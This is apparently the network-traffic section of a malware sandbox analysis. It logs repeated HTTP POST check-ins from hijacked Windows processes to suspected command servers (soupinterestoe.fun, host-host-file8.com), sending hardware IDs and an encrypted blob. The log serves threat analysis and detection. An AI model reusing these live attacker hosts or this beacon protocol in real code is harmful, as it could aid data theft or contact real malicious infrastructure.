Dec 27, 2023 17:58:02.627543926 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=go0ec8cmnqmibehvpftapt95tp; expires=Sun, 21-Apr-2024 10:44:41 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bQIPNN5L08cvemRIUdoa3XY7t0bAYTmjbW3sI%2Bx95RWjwzvyaugWCNQULHQiK%2FZxNfx198uNe6VWcBqT1vUIYkOXlq2g2W6zYJvi9w%2BSnQ2Y%2F7dk4u573R9d6MGAWkd9Xl1Az24%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b224 Data Raw: Data Ascii:
Dec 27, 2023 17:58:02.627561092 CET	34	IN	Data Raw: 39 39 32 63 62 61 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 992cba-DFWfok 212.102.41.2
Dec 27, 2023 17:58:02.627572060 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49785	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:02.214365959 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:02.214427948 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:02.756079912 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8pv8ueub01fam5dk471ojjpjm8; expires=Sun, 21-Apr-2024 10:44:41 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:02 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9qZJSH52vY270yzJIp5JCOJKU4Vy04qBlW0UWl7Rr0o5DwzfCga9psZ%2B0UxtJD3%2B7i9NYhJSmeaELQewrdJHC8U8yK3ImJETtYVtDoJHGwZ8w6PCR%2FYOthXrRw%2BsrEnM%2BXkq9SE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b2 Data Raw: Data Ascii:
Dec 27, 2023 17:58:02.756095886 CET	43	IN	Data Raw: 33 65 64 63 65 38 31 62 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 3edce81b-DFW15Malformed packet data
Dec 27, 2023 17:58:02.756107092 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49786	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:03.374597073 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:03.374847889 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:03.772536993 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=a2v569hf8dsq10hpksrns9l9v6; expires=Sun, 21-Apr-2024 10:44:42 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:03 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eq%2BOCgR88ml6%2BzKIXy%2BXs2Tt6wwS6g8G2OJkVN4M%2FdFgETU2pdgX1baW29i9d4hc8sExwrXqzHPX%2Bwjlaj9z%2B4ML45tAp6QKn8emsZ5d1IQ5BtmgfO9aevvGdep6uQfxWuku9tA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:03.772556067 CET	45	IN	Data Raw: 32 62 37 65 66 39 36 62 37 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2b7ef96b71-DFW15Malformed packet data
Dec 27, 2023 17:58:03.772566080 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49788	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:04.216555119 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:04.216634989 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:04.747133017 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=3haqk5se1udaupcq020og2ctb9; expires=Sun, 21-Apr-2024 10:44:43 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fohBse5J%2B6bHcYK9pB5qUzwEVotkNJ6FJSr7%2B7cxvGWZSPzPSjtP87949LcAQDn78qNZ%2Fc%2Fj8xEyhwwdAgEINgoDnyRfHRQ645La2x7MLgnyQul4WibimQArTlaJ7ip6GMNorPA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b30c Data Raw: Data Ascii:
Dec 27, 2023 17:58:04.747145891 CET	41	IN	Data Raw: 64 32 30 62 63 66 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: d20bcf-DFW15Malformed packet data
Dec 27, 2023 17:58:04.747157097 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49792	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:04.780122995 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:04.780292988 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:05.164232016 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=4e1g848ak9lhisbbnrmslq4ouf; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EgxzveksWymXSC3a7e4qUC2rE2REAcVYUeWemGt%2B48IxxuqV%2BcX7wB%2Fxm%2Fc86Sp5Qv6q23FrCRBysG%2F0FjPZ444mPrH%2BpD4OL5jFfV0xh%2BrZxvCtiEpzO9CoIfOGoJmKH8LnIdI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:58:05.164247036 CET	47	IN	Data Raw: 31 62 33 34 34 39 31 33 65 38 35 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 1b344913e853-DFW15Malformed packet data
Dec 27, 2023 17:58:05.164257050 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49793	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:05.052968979 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:05.053031921 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:05.434115887 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=e84ce91oq6pom6h8apjdhm5as4; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1TbKymDNMguqsr1Jp6Zlx4FoRRxgfnUGPAumSjEu7eDPtf%2F%2F9%2BVEJrQLHunNThFSnkBQmImV%2BV1DnGvnmpv304YgQciuJjU9VdIJCB8e0Pzs2Uj1rGnQwiUWhobT4muYDduO0rY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b35f Data Raw: Data Ascii:
Dec 27, 2023 17:58:05.434129953 CET	41	IN	Data Raw: 30 36 32 63 64 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 062cd4-DFW15Malformed packet data
Dec 27, 2023 17:58:05.434142113 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49796	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:05.440020084 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:05.440197945 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:05.973654032 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=dppfl1elllrmeaj6bgrc3oqtqs; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rRgvdUFcnWUkYvPWzSe6kakLKuIUxbW4RN3MIkgKZ0Yi%2FoJiV3%2FUwsYfteOgm%2BKKK0pQ%2FM2F7Y6vam%2FzltOlNHlDebtxExHjGyCidsKnnN2DgPhPqV37DPKBX0hufYLRZMmqV5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b3 Data Raw: Data Ascii:
Dec 27, 2023 17:58:05.973666906 CET	43	IN	Data Raw: 36 64 35 35 32 63 61 36 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 6d552ca6-DFW15Malformed packet data
Dec 27, 2023 17:58:05.973676920 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49797	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:05.623718977 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:05.623826981 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:06.000114918 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=u34vnqlgud6ckgje76kvdjnnco; expires=Sun, 21-Apr-2024 10:44:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dFw%2F2DEgOrQsc3d3Hh%2FBtSlEB2gQOHnMYwD0zvlf1QR3tf9t9toTn9kle3%2FrEQiaZwZ1dYChKGLBes9RJFiMsCLunqJDC844s0GdTLY5TuzbFb9ZrlY7zAG5fD0cjmjz1jmzAqA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b39896 Data Raw: Data Ascii:
Dec 27, 2023 17:58:06.000130892 CET	39	IN	Data Raw: 37 32 66 38 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 72f8-DFW15Malformed packet data
Dec 27, 2023 17:58:06.000185013 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49798	158.160.130.138	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:06.076421022 CET	274	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://opffowoxic.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: host-host-file8.com
Dec 27, 2023 17:58:06.076459885 CET	290	OUT	Data Raw: 10 87 f5 e0 1b f2 a5 b2 c8 4a 76 32 76 cb ec 8a 43 17 da 43 d0 37 1a 9f cb 9b ae f2 fd d3 9a f6 6c b4 5a d1 10 69 cc 95 ed da f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 59 a2 c2 32 Data Ascii: Jv2vCC7lZiz\wu$f]dY2'N'x+EuM(B0tru.9V+y[IDu4?]G9@AJJ3?w{'[`s,gmVZ?(gK}cXT2$:btj9}\(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49799	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:06.230710983 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:06.230770111 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
